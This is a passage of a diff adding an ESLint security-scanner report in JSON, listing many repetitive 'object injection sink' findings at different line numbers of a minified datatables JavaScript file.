+ "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 441, + "end_line": 441, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 443, + "end_line": 443, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 55, + "end_line": 55, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Function Call Object Injection Sink", + "message": "Function Call Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 445, + "end_line": 445, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 446, + "end_line": 446, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Variable Assigned to Object Injection Sink", + "message": "Variable Assigned to Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 448, + "end_line": 448, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Variable Assigned to Object Injection Sink", + "message": "Variable Assigned to Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 461, + "end_line": 461, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 462, + "end_line": 462, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 463, + "end_line": 463, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 486, + "end_line": 486, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 488, + "end_line": 488, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Function Call Object Injection Sink", + "message": "Function Call Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 490, + "end_line": 490, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Variable Assigned to Object Injection Sink", + "message": "Variable Assigned to Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 491, + "end_line": 491, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Function Call Object Injection Sink", + "message": "Function Call Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 503, + "end_line": 503, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Function Call Object Injection Sink", + "message": "Function Call Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 506, + "end_line": 506, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 507, + "end_line": 507, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Function Call Object Injection Sink", + "message": "Function Call Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 510, + "end_line": 510, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 518, + "end_line": 518, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 519, + "end_line": 519, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 521, + "end_line": 521, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 524, + "end_line": 524, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 525, + "end_line": 525, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 526, + "end_line": 526, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 530, + "end_line": 530, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 531, + "end_line": 531, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 534, + "end_line": 534, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 542, + "end_line": 542, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Variable Assigned to Object Injection Sink", + "message": "Variable Assigned to Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 568, + "end_line": 568, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Variable Assigned to Object Injection Sink", + "message": "Variable Assigned to Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 569, + "end_line": 569, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Function Call Object Injection Sink", + "message": "Function Call Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 574, + "end_line": 574, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Variable Assigned to Object Injection Sink", + "message": "Variable Assigned to Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 575, + "end_line": 575, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 589, + "end_line": 589, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 592, + "end_line": 592, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Function Call Object Injection Sink", + "message": "Function Call Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 593, + "end_line": 593, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 594, + "end_line": 594, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 595, + "end_line": 595, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Function Call Object Injection Sink", + "message": "Function Call Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 631, + "end_line": 631, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 661, + "end_line": 661, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": 